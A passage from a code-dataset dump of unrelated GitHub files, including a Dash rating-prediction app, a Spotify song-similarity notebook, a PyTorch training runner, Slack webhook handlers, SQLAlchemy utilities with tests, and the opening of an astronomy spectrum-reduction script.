so the model is most accurate for items around that price range. However, the dataset also contained a few items priced much higher;
one, for instance, was listed at over $2400. The same applies to all of the adjustable inputs on the left. The parameters are preset to only
allow values close to the model's optimal range, but there is enough wiggle room that outliers on either end will reduce the accuracy of the prediction.
"""
)
],
)
layout = dbc.Row([column1, column2])
import pandas as pd
@app.callback(
Output('prediction-content', 'children'),
[Input('price', 'value'),
Input('number_available_in_stock', 'value'),
Input('number_of_reviews', 'value'),
Input('number_of_answered_questions', 'value'),
Input('new_description', 'value'),
Input('new_customer_reviews', 'value'),
Input('new_customer_questions_and_answers', 'value'),
Input('new_product_information', 'value')],
)
def predict(price,
number_available_in_stock,
number_of_reviews,
number_of_answered_questions,
new_description,
new_customer_reviews,
new_customer_questions_and_answers,
new_product_information):
y_pred = pipeline.predict([[price,
number_available_in_stock,
number_of_reviews,
number_of_answered_questions,
new_description,
new_customer_reviews,
new_customer_questions_and_answers,
new_product_information]])
estimate = y_pred[0]
return f'{estimate:.2f}/5 Star Rated Product'
``` |
{
"source": "JoshFowlkes/Data-science",
"score": 3
} |
#### File: JoshFowlkes/Data-science/SpotifyProjectFirstModel.py
```python
import os
try:
os.chdir(os.path.join(os.getcwd(), 'SpotifyProject'))
print(os.getcwd())
except:
pass
#%%
import pandas as pd
import numpy as np
from sklearn.preprocessing import StandardScaler
from sklearn.neighbors import KDTree
#%%
df = pd.read_csv('SpotifyAudioFeaturesApril2019 copy.csv')
#%%
df.head()
#%%
# Now to Make a Function to sum all this up and try different clustering models
def find_nearest_songs(df):
# remove categoricals
df_numerics = df.drop(columns=['track_id', 'track_name', 'artist_name'])
# Scale Data To Cluster More Accurately, and fit clustering model
df_scaled = StandardScaler().fit_transform(df_numerics)
df_modeled = KDTree(df_scaled)
# Querying the model for the 15 Nearest Neighbors
dist, ind = df_modeled.query(df_scaled, k=16)
# Putting the Results into a Dataframe
dist_df = pd.DataFrame(dist)
# Calculating the Distances
scores = (1 - ((dist - dist.min()) / (dist.max() - dist.min()))) * 100
# Creating A New Dataframe for the Distances
columns = ['Searched_Song', 'Nearest_Song1', 'Nearest_Song2', 'Nearest_Song3', 'Nearest_Song4',
'Nearest_Song5', 'Nearest_Song6', 'Nearest_Song7', 'Nearest_Song8', 'Nearest_Song9',
'Nearest_Song10', 'Nearest_Song11', 'Nearest_Song12', 'Nearest_Song13', 'Nearest_Song14',
'Nearest_Song15']
dist_score = pd.DataFrame(scores.tolist(), columns = columns)
# An Array of all indices of the nearest neighbors
ind[:16]
# Making an array of the Track IDs
song_ids = np.array(df.track_id)
# A function that creates a list of each song with its nearest neighbors
def find_similars(song_ids, ind):
similars = []
for row in ind:
ids = [song_ids[i] for i in row]
similars.append(ids)
return similars
# using the above function
nearest_neighbors = find_similars(song_ids, ind)
# putting the results into a dataframe
nearest_neighbors_df = pd.DataFrame(nearest_neighbors, columns=columns)
return nearest_neighbors_df
#%%
# this takes a good two to three minutes to process
find_nearest_songs(df)
#%%
# From here, if we add both the new dataframe and the original into an SQL database, we can easily
# just run JOIN ON queries to match the song Id's with track_name, artist, and any other info we'd want to display
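#%%
# A hedged sketch (not part of the original project) of that lookup, done here in
# pandas instead of SQL: melt the neighbor table into long form and merge it back
# onto the source frame on track_id to pull in track_name and artist_name.
# The names neighbors_long, enriched and the 'rank' column are assumptions.
neighbors = find_nearest_songs(df)
neighbors_long = neighbors.melt(id_vars='Searched_Song', var_name='rank', value_name='track_id')
enriched = neighbors_long.merge(df[['track_id', 'track_name', 'artist_name']], on='track_id', how='left')
enriched.head()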
``` |
{
"source": "JoshFowlkes/DS-Unit-3-Sprint-1-Software-Engineering",
"score": 4
} |
#### File: DS-Unit-3-Sprint-1-Software-Engineering/Sprint copy/acme.py
```python
import random
""" Making The Product Class as outlined in Instructions """
class Product:
def __init__(self, name, price=10, weight=20, flammability=.5):
self.name = name
self.price = price
self.weight = weight
self.flammability = flammability
self.identifier = random.randint(100000, 999999)
""" Making the Stealability Function """
def stealability(self):
steal_ratio = self.price / self.weight
if (steal_ratio < .5):
return 'Not so stealable'
elif (steal_ratio >= .5) and (steal_ratio < 1.0):
return 'Kinda stealable'
else:
return 'Very Stealable!'
""" Making the Explode Function """
def explode(self):
explode_ratio = self.flammability * self.weight
if (explode_ratio < 10):
return '...fizzle.'
elif (explode_ratio >= 10) and (explode_ratio < 50):
return '...boom!'
else:
return 'BABOOOOM BABAY!!!!'
### part 3
""" Making the BoxingGlove Subclass of Product """
class BoxingGlove(Product):
def __init__(self, name):
super().__init__(name, weight=10)
def explode(self):
return "...it's a glove."
""" Making the Punch Function """
def punch(self):
if (self.weight < 5):
return 'That tickles.'
elif (self.weight >= 5) and (self.weight < 15):
return 'Hey that hurt!'
else:
return 'OUCH!'
```
#### File: DS-Unit-3-Sprint-1-Software-Engineering/Sprint copy/acme_report.py
```python
from random import randint, sample, uniform
from acme import Product
""" Making lists of adjectives and nouns to be used as names """
ADJECTIVES = ['Awesome', 'Shiny', 'Impressive', 'Portable', 'Improved']
NOUNS = ['Anvil', 'Catapult', 'Disguise', 'Mousetrap', '???']
""" Generate Products functions """
def generate_products(num_products=30):
products = []
""" Making a for loop to make each individual product """
for _ in range(num_products):
name = ADJECTIVES[randint(0,len(ADJECTIVES)-1)] + \
' ' + NOUNS[randint(0, len(NOUNS)-1)]
price = randint(5, 100)
weight = randint(5, 100)
flammability = uniform(0.0, 2.5)
prod = Product(name=name, price=price, weight=weight,
flammability=flammability)
products.append(prod)
return products
""" Making inventory report function """
def inventory_report(products):
if not isinstance(products, list):
raise TypeError('`products` - parameter passed must be a list')
n_prod = len(products)
if n_prod < 1 or (products is None):
return ValueError("`products` - parameter must be a non-empty list.")
tot_price, tot_wt, tot_flm = 0, 0, 0
for product in products:
tot_price += product.price
tot_wt += product.weight
tot_flm += product.flammability
avg_price = tot_price / n_prod
avg_wt = tot_wt / n_prod
avg_flm = tot_flm / n_prod
print("ACME CORPORATION OFFICIAL INVENTORY REPORT")
print("Unique product names:", len(set(products)))
print("Average price:", avg_price)
print("Average weight:", avg_wt)
print("Average flammability:", avg_flm)
if __name__ == '__main__':
inventory_report(generate_products())
``` |
{
"source": "joshfp/onfire",
"score": 2
} |
#### File: onfire/colab/runners.py
```python
import torch
from torch.optim import Adam
from torch.optim.lr_scheduler import OneCycleLR
from fastprogress.fastprogress import master_bar, progress_bar
from collections import defaultdict
import inspect
import matplotlib.pyplot as plt
from onfire.utils import batch_to_device
all = [
'SupervisedRunner',
]
class SupervisedRunner:
def __init__(self, model, loss_fn):
self.model = model
self.loss_fn = loss_fn
def fit(self, train_dl, valid_dl, epochs, lr, metrics=None, optimizer=None, scheduler=None):
device = 'cuda' if torch.cuda.is_available() else 'cpu'
self.model.to(device)
optimizer = optimizer or Adam(self.model.parameters(), lr)
if scheduler != False:
scheduler = scheduler or OneCycleLR(optimizer, lr, epochs * len(train_dl))
else:
scheduler = None
self.train_stats = TrainTracker(metrics, validate=(valid_dl is not None))
bar = master_bar(range(epochs))
bar.write(self.train_stats.metrics_names, table=True)
for epoch in bar:
self.model.train()
for batch in progress_bar(train_dl, parent=bar):
batch = batch_to_device(batch, device)
loss = self._train_batch(batch, optimizer, scheduler)
loss.backward()
optimizer.step()
optimizer.zero_grad()
if scheduler:
scheduler.step()
self.train_stats.update_train_loss(loss)
valid_outputs = []
if valid_dl:
self.model.eval()
for batch in progress_bar(valid_dl, parent=bar):
batch = batch_to_device(batch, device)
output = self._valid_batch(batch)
valid_outputs.append(output)
self.train_stats.log_epoch_results(valid_outputs)
bar.write(self.train_stats.get_metrics_values(), table=True)
def predict(self, dl, include_target=False):
device = 'cuda' if torch.cuda.is_available() else 'cpu'
self.model.to(device)
self.model.eval()
preds, ys = [], []
for batch in progress_bar(dl):
batch = batch_to_device(batch, device)
pred, y = self._predict_batch(batch, include_target)
preds.append(pred)
ys.append(y)
preds = torch.cat(preds)
return (preds, torch.cat(ys)) if include_target else preds
def _train_batch(self, batch, optimizer, scheduler):
*xb, yb = batch
output = self.model(*xb)
return self.loss_fn(output, yb)
def _valid_batch(self, batch):
*xb, yb = batch
with torch.no_grad():
output = self.model(*xb)
loss = self.loss_fn(output, yb)
return {'loss': loss.item(), 'y_true': yb.cpu(), 'y_pred': output.cpu()}
def _predict_batch(self, batch, include_target):
xb = batch[:-1] if len(batch) > 1 else [batch[0]]
yb = batch[-1].cpu() if include_target and len(batch) > 1 else None
with torch.no_grad():
output = self.model(*xb)
return output.cpu(), yb
class TrainTracker:
def __init__(self, metrics, validate):
if validate:
self.valid_loss = []
metrics = metrics if isinstance(metrics, (list, tuple)) else [metrics]
self.metrics = [Metric(metric_fn) for metric_fn in metrics if metric_fn]
self.train_smooth_loss = ExponentialMovingAverage()
self.train_loss = []
self.epoch = 0
self.validate = validate
@property
def metrics_names(self):
default_metrics = ['epoch', 'train_loss']
metrics = []
if self.validate:
metrics.append('valid_loss')
metrics.extend([metric.name for metric in self.metrics])
return default_metrics + metrics
def update_train_loss(self, loss):
self.train_smooth_loss.update(loss.item())
def log_epoch_results(self, valid_output):
self.epoch = self.epoch + 1
self.train_loss.append(self.train_smooth_loss.value)
if self.validate:
valid_output = self._process_valid_output(valid_output)
valid_loss = valid_output['loss'].mean().item()
for metric in self.metrics:
metric.update(**valid_output)
self.valid_loss.append(valid_loss)
def get_metrics_values(self, decimals=5):
default_metrics = [self.epoch, self.train_loss[-1]]
metrics = []
if self.validate:
metrics.append(self.valid_loss[-1])
metrics.extend([metric.value for metric in self.metrics])
res = default_metrics + metrics
return [str(x) if isinstance(x, int) else str(round(x, decimals)) for x in res]
def _process_valid_output(self, valid_output):
res = defaultdict(list)
for d in valid_output:
for k, v in d.items():
v = v if isinstance(v, torch.Tensor) else torch.tensor(v)
v = v if len(v.shape) else v.view(1)
res[k].append(v)
return {k: torch.cat(v) for k, v in res.items()}
def plot_loss(self):
fig, ax = plt.subplots()
ax.plot(self.train_loss, label='train')
ax.plot(self.valid_loss, label='valid')
ax.legend()
class ExponentialMovingAverage():
def __init__(self, beta=0.1):
self.beta = beta
self.initialized = False
def update(self, value):
if self.initialized:
self.mean = value * self.beta + self.mean * (1 - self.beta)
else:
self.mean = value
self.initialized = True
@property
def value(self):
return self.mean
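# Worked example of the smoothing rule above (illustrative values, not from the
# original code): with beta=0.1, update(10) initializes the mean to 10, and a
# second update(20) gives 20 * 0.1 + 10 * 0.9 = 11, so each new value only
# nudges the running mean by 10%.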
class Metric:
def __init__(self, metric_fn):
self.metric_fn = metric_fn
self.name = metric_fn.__name__ if inspect.isfunction(metric_fn) else str(metric_fn)
self.value = None
def update(self, **kwargs):
y_true, y_pred = kwargs['y_true'], kwargs['y_pred']
self.value = self.metric_fn(y_true, y_pred)
```
#### File: onfire/onfire/embedders.py
```python
import torch
import torch.nn as nn
__all__ = [
'ConcatEmbeddings',
'PassThrough',
'MeanOfEmbeddings',
]
class ConcatEmbeddings(nn.Module):
def __init__(self, fields):
super().__init__()
self.output_dim = sum([field.output_dim for field in fields.values()])
self.embedders = nn.ModuleList([field.build_embedder() for field in fields.values()])
def forward(self, x):
res = [embedder(values) for embedder, values in zip(self.embedders, x)]
return torch.cat(res, dim=1)
class PassThrough(nn.Module):
def forward(self, x):
return x
class MeanOfEmbeddings(nn.Module):
def __init__(self, vocab_size, emb_dim):
super().__init__()
self.emb = nn.Embedding(vocab_size, emb_dim, padding_idx=0)
def forward(self, x):
mask = (x != 0).float()[:, :, None]
emb = self.emb(x) * mask.float()
s = mask.squeeze(2).sum(1).clamp_min(1.)[:, None].float()
return emb.sum(dim=1) / s
```
#### File: onfire/onfire/utils.py
```python
from functools import wraps
import torch
__all__ = [
'mappify',
'batch_to_device',
]
def mappify(func):
@wraps(func)
def inner(X, **kwargs):
return [func(x, **kwargs) for x in X]
return inner
def batch_to_device(batch, device):
if isinstance(batch, torch.Tensor):
return batch.to(device)
elif isinstance(batch, (list, tuple)):
res = [batch_to_device(x, device) for x in batch]
return res if isinstance(batch, list) else tuple(res)
elif isinstance(batch, dict):
return {k: batch_to_device(v, device) for k, v in batch.items()}
``` |
{
"source": "joshfriend/atlas",
"score": 2
} |
#### File: api/webhooks/slash.py
```python
import re
import json
from textwrap import dedent
from flask import abort, jsonify, Response, request
from flask.views import MethodView
from webargs.flaskparser import use_args
from atlas.api import api_v1_blueprint as bp, log, require_token
from atlas.api.webhooks import slash_cmd_args
from atlas.api.webhooks.jira_mention import jira_command
from atlas.utils import slack_encode
class SlashCommand(MethodView):
def get(self):
# Before submitting a command to your server, Slack will occasionally
# send your command URLs a simple GET request to verify the
# certificate. These requests will include a parameter `ssl_check` set
# to 1. Mostly, you may ignore these requests, but please do respond
# with a HTTP `200 OK`.
if request.args.get('ssl_check', 0, type=int):
log.info('SSL Check...')
return Response()
else:
abort(400)
@require_token
@use_args(slash_cmd_args)
def post(self, args):
command = args['command']
if command == '/jira':
return jira_command(args)
elif command == '/debug':
debug_data = '```\n%s\n```' % json.dumps(request.form.to_dict(), indent=2)
return ephemeral_message(debug_data)
else:
log.error('Unknown command: %s', command)
msg = 'I don\'t know what to do with that command :('
return ephemeral_message(msg)
bp.add_url_rule('/webhooks/slash', view_func=SlashCommand.as_view('slash'))
def ephemeral_message(txt):
return jsonify({
'response_type': 'ephemeral',
'text': slack_encode(txt),
})
```
#### File: atlas/atlas/database.py
```python
from collections import Container
from datetime import datetime
import pytz
from sqlalchemy.orm import joinedload
from atlas.extensions import db
class CRUDMixin(object):
"""Mixin that adds convenience methods for CRUD (create, read, update, delete)
operations.
"""
@classmethod
def create(cls, commit=True, **kwargs):
"""Create a new record and save it the database."""
instance = cls(**kwargs)
return instance.save(commit=commit)
def update(self, commit=True, **kwargs):
"""Update specific fields of a record."""
# Prevent changing ID of object
kwargs.pop('id', None)
for attr, value in kwargs.iteritems():
setattr(self, attr, value)
return commit and self.save(commit=commit) or self
def save(self, commit=True):
"""Save the record."""
db.session.add(self)
if commit:
db.session.commit()
return self
def delete(self, commit=True):
"""Remove the record from the database."""
db.session.delete(self)
return commit and db.session.commit()
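# A minimal usage sketch of the mixin (a hypothetical `Note` model built on the
# `Model` base class defined below, not part of this module):
#   note = Note.create(title='hello')   # INSERT + commit
#   note.update(title='hello again')    # UPDATE + commit
#   note.delete()                       # DELETE + commit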
class Model(CRUDMixin, db.Model):
"""Base model class that includes CRUD convenience methods."""
__abstract__ = True
@classmethod
def get_by_field(cls, field, value):
col = getattr(cls, field)
return cls.query.filter(col == value).first()
class TimestampedModel(Model):
"""Mixin that add convenience methods for CRUD that also timestamps
creation and modification times.
"""
__abstract__ = True
created_at = db.Column(db.DateTime(timezone=True))
last_updated = db.Column(db.DateTime(timezone=True))
def __init__(self, *args, **kwargs):
Model.__init__(self, *args, **kwargs)
now = datetime.now(pytz.utc)
self.created_at = now
self.last_updated = now
@classmethod
def create(cls, commit=True, **kwargs):
instance = cls(**kwargs)
now = datetime.now(pytz.utc)
instance.created_at = now
instance.last_updated = now
return instance.save(commit=commit)
def update(self, commit=True, update_timestamp=True, **kwargs):
"""Update specific fields of a record."""
if update_timestamp:
now = datetime.now(pytz.utc)
self.last_updated = now
# Prevent changing ID of object
kwargs.pop('id', None)
for attr, value in kwargs.iteritems():
setattr(self, attr, value)
return self.save(commit=commit, update_timestamp=update_timestamp)
def save(self, commit=True, update_timestamp=True):
if update_timestamp:
now = datetime.now(pytz.utc)
self.last_updated = now
db.session.add(self)
if commit:
db.session.commit()
return self
# From <NAME>'s "Building the app" talk
# https://speakerdeck.com/zzzeek/building-the-app
class SurrogatePK(object):
"""A mixin that adds a surrogate integer 'primary key' column named
``id`` to any declarative-mapped class.
"""
__table_args__ = {'extend_existing': True}
id = db.Column(db.Integer, primary_key=True)
@classmethod
def get_by_id(cls, id, with_=[]):
if any(
(isinstance(id, str) and id.isdigit(),
isinstance(id, (int, float))),
):
query = cls.query
for prop in with_:
query = query.options(joinedload(prop))
return query.get(int(id))
return None
@classmethod
def get_by_ids(cls, ids):
if isinstance(ids, Container) and not isinstance(ids, str):
return cls.query.filter(cls.id.in_(ids))
return None
def __repr__(self): # pragma: no cover
return '<%s(%s)>' % (self.__class__.__name__, self.id)
```
#### File: atlas/models/slack_token.py
```python
from atlas.extensions import db
from atlas.database import SurrogatePK, TimestampedModel
class SlackToken(SurrogatePK, TimestampedModel):
token = db.Column(db.String, unique=True, nullable=False)
channel = db.Column(db.String, nullable=False)
description = db.Column(db.String)
@classmethod
def get(cls, token):
return cls.query.filter(cls.token == token).first()
@classmethod
def is_valid(cls, token):
return cls.get(token) is not None
def __str__(self):
msg = '`%s`' % self.token
if self.channel == '*':
msg += ' in all channels: '
else:
msg += ' in channel #%s: ' % self.channel
msg += self.description
return msg
``` |
{
"source": "joshfriend/sqlalchemy-utils",
"score": 2
} |
#### File: sqlalchemy-utils/sqlalchemy_utils/decorators.py
```python
from collections import defaultdict
import itertools
import sqlalchemy as sa
import six
from .functions import getdotattr
class AttributeValueGenerator(object):
def __init__(self):
self.listener_args = [
(
sa.orm.mapper,
'mapper_configured',
self.update_generator_registry
),
(
sa.orm.session.Session,
'before_flush',
self.update_generated_properties
)
]
self.reset()
def reset(self):
if (
hasattr(self, 'listeners_registered') and
self.listeners_registered
):
for args in self.listener_args:
sa.event.remove(*args)
self.listeners_registered = False
# TODO: make the registry a WeakKey dict
self.generator_registry = defaultdict(list)
def generator_wrapper(self, func, attr, source):
def wrapper(self, *args, **kwargs):
return func(self, *args, **kwargs)
if isinstance(attr, sa.orm.attributes.InstrumentedAttribute):
self.generator_registry[attr.class_].append(wrapper)
wrapper.__generates__ = attr, source
else:
wrapper.__generates__ = attr, source
return wrapper
def register_listeners(self):
if not self.listeners_registered:
for args in self.listener_args:
sa.event.listen(*args)
self.listeners_registered = True
def update_generator_registry(self, mapper, class_):
"""
Adds generator functions to generator_registry.
"""
for generator in class_.__dict__.values():
if hasattr(generator, '__generates__'):
self.generator_registry[class_].append(generator)
def update_generated_properties(self, session, ctx, instances):
for obj in itertools.chain(session.new, session.dirty):
class_ = obj.__class__
if class_ in self.generator_registry:
for func in self.generator_registry[class_]:
attr, source = func.__generates__
if not isinstance(attr, six.string_types):
attr = attr.name
if source is None:
setattr(obj, attr, func(obj))
else:
setattr(obj, attr, func(obj, getdotattr(obj, source)))
generator = AttributeValueGenerator()
def generates(attr, source=None, generator=generator):
"""
.. deprecated:: 0.28.0
Use :func:`.observer.observes` instead.
Decorator that marks given function as attribute value generator.
Many times you may have generated property values. Usual cases include
slugs from names or resized thumbnails from images.
SQLAlchemy-Utils provides a way to do this easily with `generates`
decorator:
::
class Article(Base):
__tablename__ = 'article'
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.Unicode(255))
slug = sa.Column(sa.Unicode(255))
@generates(slug)
def _create_slug(self):
return self.name.lower().replace(' ', '-')
article = self.Article()
article.name = u'some article name'
self.session.add(article)
self.session.flush()
assert article.slug == u'some-article-name'
You can also pass the attribute name as a string argument for `generates`:
::
class Article(Base):
...
@generates('slug')
def _create_slug(self):
return self.name.lower().replace(' ', '-')
These property generators can even be defined outside classes:
::
class Article(Base):
__tablename__ = 'article'
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.Unicode(255))
slug = sa.Column(sa.Unicode(255))
@generates(Article.slug)
def _create_article_slug(article):
return article.name.lower().replace(' ', '-')
Property generators can have sources outside:
::
class Document(self.Base):
__tablename__ = 'document'
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.Unicode(255))
locale = sa.Column(sa.String(10))
class Section(self.Base):
__tablename__ = 'section'
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.Unicode(255))
locale = sa.Column(sa.String(10))
document_id = sa.Column(
sa.Integer, sa.ForeignKey(Document.id)
)
document = sa.orm.relationship(Document)
@generates(locale, source='document')
def copy_locale(self, document):
return document.locale
You can also use dotted attribute paths for deep relationship paths:
::
class SubSection(self.Base):
__tablename__ = 'subsection'
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.Unicode(255))
locale = sa.Column(sa.String(10))
section_id = sa.Column(
sa.Integer, sa.ForeignKey(Section.id)
)
section = sa.orm.relationship(Section)
@generates(locale, source='section.document')
def copy_locale(self, document):
return document.locale
"""
generator.register_listeners()
def wraps(func):
return generator.generator_wrapper(func, attr, source)
return wraps
```
#### File: sqlalchemy-utils/tests/__init__.py
```python
import warnings
import sqlalchemy as sa
from sqlalchemy import create_engine
from sqlalchemy.orm import sessionmaker
from sqlalchemy.ext.declarative import declarative_base, synonym_for
from sqlalchemy.ext.hybrid import hybrid_property
from sqlalchemy_utils import (
InstrumentedList, coercion_listener, aggregates, i18n
)
@sa.event.listens_for(sa.engine.Engine, 'before_cursor_execute')
def count_sql_calls(conn, cursor, statement, parameters, context, executemany):
try:
conn.query_count += 1
except AttributeError:
conn.query_count = 1
warnings.simplefilter('error', sa.exc.SAWarning)
sa.event.listen(sa.orm.mapper, 'mapper_configured', coercion_listener)
def get_locale():
class Locale():
territories = {'fi': 'Finland'}
return Locale()
class TestCase(object):
dns = 'sqlite:///:memory:'
create_tables = True
def setup_method(self, method):
self.engine = create_engine(self.dns)
# self.engine.echo = True
self.connection = self.engine.connect()
self.Base = declarative_base()
self.create_models()
sa.orm.configure_mappers()
if self.create_tables:
self.Base.metadata.create_all(self.connection)
Session = sessionmaker(bind=self.connection)
self.session = Session()
i18n.get_locale = get_locale
def teardown_method(self, method):
aggregates.manager.reset()
self.session.close_all()
if self.create_tables:
self.Base.metadata.drop_all(self.connection)
self.connection.close()
self.engine.dispose()
def create_models(self):
class User(self.Base):
__tablename__ = 'user'
id = sa.Column(sa.Integer, autoincrement=True, primary_key=True)
name = sa.Column(sa.Unicode(255))
class Category(self.Base):
__tablename__ = 'category'
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.Unicode(255))
@hybrid_property
def articles_count(self):
return len(self.articles)
@articles_count.expression
def articles_count(cls):
return (
sa.select([sa.func.count(self.Article.id)])
.where(self.Article.category_id == self.Category.id)
.correlate(self.Article.__table__)
.label('article_count')
)
@property
def name_alias(self):
return self.name
@synonym_for('name')
@property
def name_synonym(self):
return self.name
class Article(self.Base):
__tablename__ = 'article'
id = sa.Column(sa.Integer, primary_key=True)
name = sa.Column(sa.Unicode(255), index=True)
category_id = sa.Column(sa.Integer, sa.ForeignKey(Category.id))
category = sa.orm.relationship(
Category,
primaryjoin=category_id == Category.id,
backref=sa.orm.backref(
'articles',
collection_class=InstrumentedList
)
)
self.User = User
self.Category = Category
self.Article = Article
def assert_contains(clause, query):
# Test that query executes
query.all()
assert clause in str(query)
```
#### File: tests/observes/test_o2o_o2o_o2o.py
```python
import sqlalchemy as sa
from sqlalchemy_utils.observer import observes
from tests import TestCase
class TestObservesForOneToOneToOneToOne(TestCase):
dns = 'postgres://postgres@localhost/sqlalchemy_utils_test'
def create_models(self):
class Catalog(self.Base):
__tablename__ = 'catalog'
id = sa.Column(sa.Integer, primary_key=True)
product_price = sa.Column(sa.Integer)
@observes('category.sub_category.product')
def product_observer(self, product):
self.product_price = product.price if product else None
category = sa.orm.relationship(
'Category',
uselist=False,
backref='catalog'
)
class Category(self.Base):
__tablename__ = 'category'
id = sa.Column(sa.Integer, primary_key=True)
catalog_id = sa.Column(sa.Integer, sa.ForeignKey('catalog.id'))
sub_category = sa.orm.relationship(
'SubCategory',
uselist=False,
backref='category'
)
class SubCategory(self.Base):
__tablename__ = 'sub_category'
id = sa.Column(sa.Integer, primary_key=True)
category_id = sa.Column(sa.Integer, sa.ForeignKey('category.id'))
product = sa.orm.relationship(
'Product',
uselist=False,
backref='sub_category'
)
class Product(self.Base):
__tablename__ = 'product'
id = sa.Column(sa.Integer, primary_key=True)
price = sa.Column(sa.Integer)
sub_category_id = sa.Column(
sa.Integer, sa.ForeignKey('sub_category.id')
)
self.Catalog = Catalog
self.Category = Category
self.SubCategory = SubCategory
self.Product = Product
def create_catalog(self):
sub_category = self.SubCategory(product=self.Product(price=123))
category = self.Category(sub_category=sub_category)
catalog = self.Catalog(category=category)
self.session.add(catalog)
self.session.flush()
return catalog
def test_simple_insert(self):
catalog = self.create_catalog()
assert catalog.product_price == 123
def test_replace_leaf_object(self):
catalog = self.create_catalog()
product = self.Product(price=44)
catalog.category.sub_category.product = product
self.session.flush()
assert catalog.product_price == 44
def test_delete_leaf_object(self):
catalog = self.create_catalog()
self.session.delete(catalog.category.sub_category.product)
self.session.flush()
assert catalog.product_price is None
```
#### File: tests/types/test_encrypted.py
```python
import sqlalchemy as sa
from datetime import datetime, date, time
import pytest
from pytest import mark
cryptography = None
try:
import cryptography
except ImportError:
pass
from tests import TestCase
from sqlalchemy_utils import EncryptedType, PhoneNumberType, ColorType
from sqlalchemy_utils.types.encrypted import AesEngine, FernetEngine
@mark.skipif('cryptography is None')
class EncryptedTypeTestCase(TestCase):
@pytest.fixture(scope='function')
def user(self, request):
# set the values to the user object
self.user = self.User()
self.user.username = self.user_name
self.user.phone = self.user_phone
self.user.color = self.user_color
self.user.date = self.user_date
self.user.time = self.user_time
self.user.enum = self.user_enum
self.user.datetime = self.user_datetime
self.user.access_token = self.test_token
self.user.is_active = self.active
self.user.accounts_num = self.accounts_num
self.session.add(self.user)
self.session.commit()
# register a finalizer to cleanup
def finalize():
del self.user_name
del self.test_token
del self.active
del self.accounts_num
del self.test_key
del self.searched_user
request.addfinalizer(finalize)
return self.session.query(self.User).get(self.user.id)
def generate_test_token(self):
import string
import random
characters = string.ascii_letters + string.digits
return ''.join(random.choice(characters) for _ in range(60))
def create_models(self):
# set some test values
self.test_key = 'secretkey1234'
self.user_name = u'someone'
self.user_phone = u'(555) 555-5555'
self.user_color = u'#fff'
self.user_enum = 'One'
self.user_date = date(2010, 10, 2)
self.user_time = time(10, 12)
self.user_datetime = datetime(2010, 10, 2, 10, 12)
self.test_token = self.generate_test_token()
self.active = True
self.accounts_num = 2
self.searched_user = None
class User(self.Base):
__tablename__ = 'user'
id = sa.Column(sa.Integer, primary_key=True)
username = sa.Column(EncryptedType(
sa.Unicode,
self.test_key,
self.__class__.encryption_engine)
)
access_token = sa.Column(EncryptedType(
sa.String,
self.test_key,
self.__class__.encryption_engine)
)
is_active = sa.Column(EncryptedType(
sa.Boolean,
self.test_key,
self.__class__.encryption_engine)
)
accounts_num = sa.Column(EncryptedType(
sa.Integer,
self.test_key,
self.__class__.encryption_engine)
)
phone = sa.Column(EncryptedType(
PhoneNumberType,
self.test_key,
self.__class__.encryption_engine)
)
color = sa.Column(EncryptedType(
ColorType,
self.test_key,
self.__class__.encryption_engine)
)
date = sa.Column(EncryptedType(
sa.Date,
self.test_key,
self.__class__.encryption_engine)
)
time = sa.Column(EncryptedType(
sa.Time,
self.test_key,
self.__class__.encryption_engine)
)
datetime = sa.Column(EncryptedType(
sa.DateTime,
self.test_key,
self.__class__.encryption_engine)
)
enum = sa.Column(EncryptedType(
sa.Enum('One', name='user_enum_t'),
self.test_key,
self.__class__.encryption_engine)
)
self.User = User
class Team(self.Base):
__tablename__ = 'team'
id = sa.Column(sa.Integer, primary_key=True)
key = sa.Column(sa.String(50))
name = sa.Column(EncryptedType(
sa.Unicode,
lambda: self._team_key,
self.__class__.encryption_engine)
)
self.Team = Team
def test_unicode(self, user):
assert user.username == self.user_name
def test_string(self, user):
assert user.access_token == self.test_token
def test_boolean(self, user):
assert user.is_active == self.active
def test_integer(self, user):
assert user.accounts_num == self.accounts_num
def test_phone_number(self, user):
assert str(user.phone) == self.user_phone
def test_color(self, user):
assert user.color.hex == self.user_color
def test_date(self, user):
assert user.date == self.user_date
def test_datetime(self, user):
assert user.datetime == self.user_datetime
def test_time(self, user):
assert user.time == self.user_time
def test_enum(self, user):
assert user.enum == self.user_enum
def test_lookup_key(self):
# Add teams
self._team_key = 'one'
team = self.Team(key=self._team_key, name=u'One')
self.session.add(team)
self.session.commit()
team_1_id = team.id
self._team_key = 'two'
team = self.Team(key=self._team_key)
team.name = u'Two'
self.session.add(team)
self.session.commit()
team_2_id = team.id
# Lookup teams
self._team_key = self.session.query(self.Team.key).filter_by(
id=team_1_id
).one()[0]
team = self.session.query(self.Team).get(team_1_id)
assert team.name == u'One'
with pytest.raises(Exception):
self.session.query(self.Team).get(team_2_id)
self.session.expunge_all()
self._team_key = self.session.query(self.Team.key).filter_by(
id=team_2_id
).one()[0]
team = self.session.query(self.Team).get(team_2_id)
assert team.name == u'Two'
with pytest.raises(Exception):
self.session.query(self.Team).get(team_1_id)
self.session.expunge_all()
# Remove teams
self.session.query(self.Team).delete()
self.session.commit()
class TestAesEncryptedTypeTestcase(EncryptedTypeTestCase):
encryption_engine = AesEngine
def test_lookup_by_encrypted_string(self, user):
test = self.session.query(self.User).filter(
self.User.username == self.user_name
).first()
assert test.username == user.username
class TestFernetEncryptedTypeTestCase(EncryptedTypeTestCase):
encryption_engine = FernetEngine
``` |
{
"source": "joshfuchs/photometry",
"score": 2
} |
#### File: joshfuchs/photometry/ReduceSpec_tools.py
```python
import numpy as np
#import pyfits as fits
import astropy.io.fits as fits
import os
import datetime
import matplotlib.pyplot as plt
import cosmics
from glob import glob
from astropy.convolution import convolve, convolve_fft, Box2DKernel
# ===========================================================================
# Lesser Functions Used by Main Functions ===================================
# ===========================================================================
def init():
global diagnostic
diagnostic = np.zeros([2071,8])
def save_diagnostic():
#This function saves a diagnostic file to be used later to create diagnostic plots
global now
now = datetime.datetime.now().strftime("%Y-%m-%dT%H:%M")
header = 'Reduction done on ' + now + ' \n Columns are: 0) average from bias, 1) average from scaled bias, 2) standard deviation of bias \n 3) flat field average, 4) flat field standard deviation, 5) flat field scaled average, 6) flat field scaled standard deviation '
with open('reduction_' + now + '.txt','ab') as handle:
